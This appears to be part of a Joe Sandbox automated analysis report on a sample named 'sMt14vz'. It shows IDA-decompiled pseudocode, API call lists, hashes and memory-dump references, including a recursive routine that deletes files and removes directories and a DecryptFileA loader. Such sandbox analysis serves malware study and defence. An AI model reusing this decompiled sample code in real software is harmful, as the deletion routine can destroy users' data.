                                                                                                                                                                                                                                            										_t12 = 1;
                                                                                                                                                                                                                                            										goto L17;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags =  *0x10d9a30 - _t22;
                                                                                                                                                                                                                                            										if( *0x10d9a30 != _t22) {
                                                                                                                                                                                                                                            											goto L26;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t25 = E010D3BA2(); // executed
                                                                                                                                                                                                                                            										__eflags = _t25;
                                                                                                                                                                                                                                            										if(_t25 == 0) {
                                                                                                                                                                                                                                            											goto L16;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t22 =  *0x10d8a24; // 0x0
                                                                                                                                                                                                                                            										goto L26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t27 = E010D3B26(_t40, _t44);
                                                                                                                                                                                                                                            								__eflags = _t27;
                                                                                                                                                                                                                                            								if(_t27 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t43 = 0x4bc;
                                                                                                                                                                                                                                            							E010D44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                            							 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t30 = E010D621E(); // executed
                                                                                                                                                                                                                                            							if(_t30 == 0) {
                                                                                                                                                                                                                                            								goto L16;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t49 =  *0x10d8a24;
                                                                                                                                                                                                                                            				if( *0x10d8a24 != 0) {
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					_t34 = E010D3A3F(_t51);
                                                                                                                                                                                                                                            					_t52 = _t34;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E010D51E5(_t49) == 0) {
                                                                                                                                                                                                                                            					goto L16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t51 =  *0x10d8a38;
                                                                                                                                                                                                                                            				if( *0x10d8a38 != 0) {
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L4;
                                                                                                                                                                                                                                            			}


























                                                                                                                                                                                                                                            0x010d2f1d
                                                                                                                                                                                                                                            0x010d2f28
                                                                                                                                                                                                                                            0x010d2f2f
                                                                                                                                                                                                                                            0x010d2f3d
                                                                                                                                                                                                                                            0x010d2f6c
                                                                                                                                                                                                                                            0x010d2f6c
                                                                                                                                                                                                                                            0x010d2f71
                                                                                                                                                                                                                                            0x010d2f73
                                                                                                                                                                                                                                            0x010d3041
                                                                                                                                                                                                                                            0x010d3041
                                                                                                                                                                                                                                            0x010d3043
                                                                                                                                                                                                                                            0x010d3053
                                                                                                                                                                                                                                            0x010d3053
                                                                                                                                                                                                                                            0x010d2f79
                                                                                                                                                                                                                                            0x010d2f80
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2f86
                                                                                                                                                                                                                                            0x010d2f86
                                                                                                                                                                                                                                            0x010d2f93
                                                                                                                                                                                                                                            0x010d2f9e
                                                                                                                                                                                                                                            0x010d2fa0
                                                                                                                                                                                                                                            0x010d2fa6
                                                                                                                                                                                                                                            0x010d2fb8
                                                                                                                                                                                                                                            0x010d2fba
                                                                                                                                                                                                                                            0x010d2fbe
                                                                                                                                                                                                                                            0x010d2fc6
                                                                                                                                                                                                                                            0x010d2fcc
                                                                                                                                                                                                                                            0x010d2fd4
                                                                                                                                                                                                                                            0x010d2fd6
                                                                                                                                                                                                                                            0x010d2fd8
                                                                                                                                                                                                                                            0x010d2fe0
                                                                                                                                                                                                                                            0x010d2fe6
                                                                                                                                                                                                                                            0x010d2fee
                                                                                                                                                                                                                                            0x010d2ff0
                                                                                                                                                                                                                                            0x010d2ff5
                                                                                                                                                                                                                                            0x010d2ff5
                                                                                                                                                                                                                                            0x010d2fee
                                                                                                                                                                                                                                            0x010d2fd4
                                                                                                                                                                                                                                            0x010d2ff8
                                                                                                                                                                                                                                            0x010d2ffe
                                                                                                                                                                                                                                            0x010d3004
                                                                                                                                                                                                                                            0x010d3017
                                                                                                                                                                                                                                            0x010d301c
                                                                                                                                                                                                                                            0x010d3024
                                                                                                                                                                                                                                            0x010d3054
                                                                                                                                                                                                                                            0x010d305a
                                                                                                                                                                                                                                            0x010d3065
                                                                                                                                                                                                                                            0x010d3065
                                                                                                                                                                                                                                            0x010d306c
                                                                                                                                                                                                                                            0x010d3075
                                                                                                                                                                                                                                            0x010d307a
                                                                                                                                                                                                                                            0x010d307a
                                                                                                                                                                                                                                            0x010d307c
                                                                                                                                                                                                                                            0x010d3081
                                                                                                                                                                                                                                            0x010d3087
                                                                                                                                                                                                                                            0x010d3089
                                                                                                                                                                                                                                            0x010d30a1
                                                                                                                                                                                                                                            0x010d30a1
                                                                                                                                                                                                                                            0x010d30a9
                                                                                                                                                                                                                                            0x010d30ab
                                                                                                                                                                                                                                            0x010d30ad
                                                                                                                                                                                                                                            0x010d30af
                                                                                                                                                                                                                                            0x010d30af
                                                                                                                                                                                                                                            0x010d30ad
                                                                                                                                                                                                                                            0x010d30b6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d308b
                                                                                                                                                                                                                                            0x010d308b
                                                                                                                                                                                                                                            0x010d3091
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3093
                                                                                                                                                                                                                                            0x010d3098
                                                                                                                                                                                                                                            0x010d309a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d309c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d309c
                                                                                                                                                                                                                                            0x010d3089
                                                                                                                                                                                                                                            0x010d305c
                                                                                                                                                                                                                                            0x010d3061
                                                                                                                                                                                                                                            0x010d3063
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3063
                                                                                                                                                                                                                                            0x010d302b
                                                                                                                                                                                                                                            0x010d3032
                                                                                                                                                                                                                                            0x010d303c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d300e
                                                                                                                                                                                                                                            0x010d300e
                                                                                                                                                                                                                                            0x010d3015
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3015
                                                                                                                                                                                                                                            0x010d3004
                                                                                                                                                                                                                                            0x010d2f80
                                                                                                                                                                                                                                            0x010d2f3f
                                                                                                                                                                                                                                            0x010d2f46
                                                                                                                                                                                                                                            0x010d2f5f
                                                                                                                                                                                                                                            0x010d2f5f
                                                                                                                                                                                                                                            0x010d2f64
                                                                                                                                                                                                                                            0x010d2f66
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2f66
                                                                                                                                                                                                                                            0x010d2f4f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2f55
                                                                                                                                                                                                                                            0x010d2f5d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 010D2F93
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 010D2FB2
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 010D2FC6
                                                                                                                                                                                                                                            • DecryptFileA.ADVAPI32 ref: 010D2FE6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 010D2FF8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(010D91E4), ref: 010D301C
                                                                                                                                                                                                                                              • Part of subcall function 010D51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010D2F4D,?,00000002,00000000), ref: 010D5201
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                            • String ID: DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 2126469477-2381948369
                                                                                                                                                                                                                                            • Opcode ID: 91289b71f9bb5fd24269c9eea198347ccd330ca9c8c55b162b403bf062b58e12
                                                                                                                                                                                                                                            • Instruction ID: ea1ae867a40cabce1fb9080f12161bd70bcd90704692a8f9692a425c921c2b30
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91289b71f9bb5fd24269c9eea198347ccd330ca9c8c55b162b403bf062b58e12
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0641FA71A013168AEB71AB7D9C547A63BE8BB44754F0040A5FEC1CA145EB7AC580CB63
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E010D2390(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				char _v284;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            				int _t36;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                            				_t21 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_t65 = __ecx;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_pop(_t62);
                                                                                                                                                                                                                                            					_pop(_t66);
                                                                                                                                                                                                                                            					_pop(_t46);
                                                                                                                                                                                                                                            					return E010D6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E010D1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                            					_t58 = 0x104;
                                                                                                                                                                                                                                            					E010D16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                            					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                            					_t63 = _t22;
                                                                                                                                                                                                                                            					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t58 = 0x104;
                                                                                                                                                                                                                                            						E010D1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                            						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							_t58 = 0x104;
                                                                                                                                                                                                                                            							E010D16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                            							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                            							DeleteFileA( &_v280);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                            								E010D16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                            								_t58 = 0x104;
                                                                                                                                                                                                                                            								E010D658A( &_v280, 0x104, 0x10d1140);
                                                                                                                                                                                                                                            								E010D2390( &_v284);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                            					} while (_t36 != 0);
                                                                                                                                                                                                                                            					FindClose(_t63); // executed
                                                                                                                                                                                                                                            					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                                            0x010d2398
                                                                                                                                                                                                                                            0x010d239e
                                                                                                                                                                                                                                            0x010d23a3
                                                                                                                                                                                                                                            0x010d23a5
                                                                                                                                                                                                                                            0x010d23ae
                                                                                                                                                                                                                                            0x010d23b3
                                                                                                                                                                                                                                            0x010d24cb
                                                                                                                                                                                                                                            0x010d24d2
                                                                                                                                                                                                                                            0x010d24d3
                                                                                                                                                                                                                                            0x010d24d4
                                                                                                                                                                                                                                            0x010d24df
                                                                                                                                                                                                                                            0x010d23c2
                                                                                                                                                                                                                                            0x010d23d1
                                                                                                                                                                                                                                            0x010d23db
                                                                                                                                                                                                                                            0x010d23e4
                                                                                                                                                                                                                                            0x010d23f6
                                                                                                                                                                                                                                            0x010d23fc
                                                                                                                                                                                                                                            0x010d2401
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2407
                                                                                                                                                                                                                                            0x010d2407
                                                                                                                                                                                                                                            0x010d2408
                                                                                                                                                                                                                                            0x010d2411
                                                                                                                                                                                                                                            0x010d241f
                                                                                                                                                                                                                                            0x010d247a
                                                                                                                                                                                                                                            0x010d2483
                                                                                                                                                                                                                                            0x010d2495
                                                                                                                                                                                                                                            0x010d24a3
                                                                                                                                                                                                                                            0x010d2421
                                                                                                                                                                                                                                            0x010d242f
                                                                                                                                                                                                                                            0x010d2453
                                                                                                                                                                                                                                            0x010d245d
                                                                                                                                                                                                                                            0x010d2466
                                                                                                                                                                                                                                            0x010d2472
                                                                                                                                                                                                                                            0x010d2472
                                                                                                                                                                                                                                            0x010d242f
                                                                                                                                                                                                                                            0x010d24af
                                                                                                                                                                                                                                            0x010d24b5
                                                                                                                                                                                                                                            0x010d24be
                                                                                                                                                                                                                                            0x010d24c5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d24c5

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,010D8A3A,010D11F4,010D8A3A,00000000,?,?), ref: 010D23F6
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,010D11F8), ref: 010D2427
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,010D11FC), ref: 010D243B
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 010D2495
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 010D24A3
                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010), ref: 010D24AF
                                                                                                                                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 010D24BE
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(010D8A3A), ref: 010D24C5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836429354-0
                                                                                                                                                                                                                                            • Opcode ID: 68ee347738cc41d3da11f69a4aee2b671cc07626fb09fbd64ddb13d9a7b16e51
                                                                                                                                                                                                                                            • Instruction ID: ff7caeb8733792fbb63f93d0595c72f50002d6cbcd6a4c2d164eae63206117eb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68ee347738cc41d3da11f69a4aee2b671cc07626fb09fbd64ddb13d9a7b16e51
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A319232605741ABD330DAB4CD88AEB77ECAFC4305F04492DB9D587180EF7895098752
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                                            			E010D2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t4 = GetVersion();
                                                                                                                                                                                                                                            				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                            					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t17 = _t21;
                                                                                                                                                                                                                                            							 *0x10da288(0, 1, 0, 0);
                                                                                                                                                                                                                                            							 *_t21();
                                                                                                                                                                                                                                            							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                            							if(_t24 != _t24) {
                                                                                                                                                                                                                                            								_t17 = 4;
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t20 = _a12;
                                                                                                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                                                                                                            				 *0x10d9124 = 0;
                                                                                                                                                                                                                                            				if(E010D2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                            					_t9 = E010D2F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                            					_t22 = _t9; // executed
                                                                                                                                                                                                                                            					E010D52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                            					if(_t22 != 0) {
                                                                                                                                                                                                                                            						_t32 =  *0x10d8a3a; // 0x0
                                                                                                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                                                                                                            							_t19 =  *0x10d9a2c;
                                                                                                                                                                                                                                            							if(( *0x10d9a2c & 0x00000001) != 0) {
                                                                                                                                                                                                                                            								E010D1F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t6 =  *0x10d8588; // 0x0
                                                                                                                                                                                                                                            				if(_t6 != 0) {
                                                                                                                                                                                                                                            					CloseHandle(_t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return  *0x10d9124;
                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                            0x010d2c03
                                                                                                                                                                                                                                            0x010d2c0d
                                                                                                                                                                                                                                            0x010d2c18
                                                                                                                                                                                                                                            0x010d2c20
                                                                                                                                                                                                                                            0x010d2c2e
                                                                                                                                                                                                                                            0x010d2c32
                                                                                                                                                                                                                                            0x010d2c36
                                                                                                                                                                                                                                            0x010d2c3d
                                                                                                                                                                                                                                            0x010d2c43
                                                                                                                                                                                                                                            0x010d2c45
                                                                                                                                                                                                                                            0x010d2c47
                                                                                                                                                                                                                                            0x010d2c49
                                                                                                                                                                                                                                            0x010d2c4e
                                                                                                                                                                                                                                            0x010d2c4e
                                                                                                                                                                                                                                            0x010d2c47
                                                                                                                                                                                                                                            0x010d2c32
                                                                                                                                                                                                                                            0x010d2c20
                                                                                                                                                                                                                                            0x010d2c50
                                                                                                                                                                                                                                            0x010d2c54
                                                                                                                                                                                                                                            0x010d2c57
                                                                                                                                                                                                                                            0x010d2c64
                                                                                                                                                                                                                                            0x010d2c66
                                                                                                                                                                                                                                            0x010d2c6b
                                                                                                                                                                                                                                            0x010d2c6d
                                                                                                                                                                                                                                            0x010d2c74
                                                                                                                                                                                                                                            0x010d2c76
                                                                                                                                                                                                                                            0x010d2c7c
                                                                                                                                                                                                                                            0x010d2c7e
                                                                                                                                                                                                                                            0x010d2c87
                                                                                                                                                                                                                                            0x010d2c89
                                                                                                                                                                                                                                            0x010d2c89
                                                                                                                                                                                                                                            0x010d2c87
                                                                                                                                                                                                                                            0x010d2c7c
                                                                                                                                                                                                                                            0x010d2c74
                                                                                                                                                                                                                                            0x010d2c8e
                                                                                                                                                                                                                                            0x010d2c95
                                                                                                                                                                                                                                            0x010d2c98
                                                                                                                                                                                                                                            0x010d2c98
                                                                                                                                                                                                                                            0x010d2ca7

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersion.KERNEL32(?,00000002,00000000,?,010D6BB0,010D0000,00000000,00000002,0000000A), ref: 010D2C03
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,?,010D6BB0,010D0000,00000000,00000002,0000000A), ref: 010D2C18
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 010D2C28
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,010D6BB0,010D0000,00000000,00000002,0000000A), ref: 010D2C98
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                            • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                            • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                            • Opcode ID: 778b361e5eabb992e38925143ce9c38470ea9369d8f18aafe70c9b69ad61d013
                                                                                                                                                                                                                                            • Instruction ID: 55c93763009cd4959a9789fbfad85669d53e7c3be164d9d516da10407b26cf7e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 778b361e5eabb992e38925143ce9c38470ea9369d8f18aafe70c9b69ad61d013
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A911E57130130A9BE7307BF9A888A6B3FA99B84394B041059FED0D3248DA3AEC418764
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D6F40() {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(E010D6EF0); // executed
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x010d6f45
                                                                                                                                                                                                                                            0x010d6f4d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 010D6F45
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                            • Opcode ID: e78a5aeaeb1481db3ffe21c7ec0770ab5e5dc1995d7d6bfa028e495c7508023b
                                                                                                                                                                                                                                            • Instruction ID: d0d7e6586172d70d0494d79137eee9ddc826bc1724da360a78826841706d5256
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e78a5aeaeb1481db3ffe21c7ec0770ab5e5dc1995d7d6bfa028e495c7508023b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F900274352200D796201B71991941575915E4D6427815464E491C9448DB6640405611
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E010D202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				void* _v532;
                                                                                                                                                                                                                                            				int _v536;
                                                                                                                                                                                                                                            				int _v540;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t46;
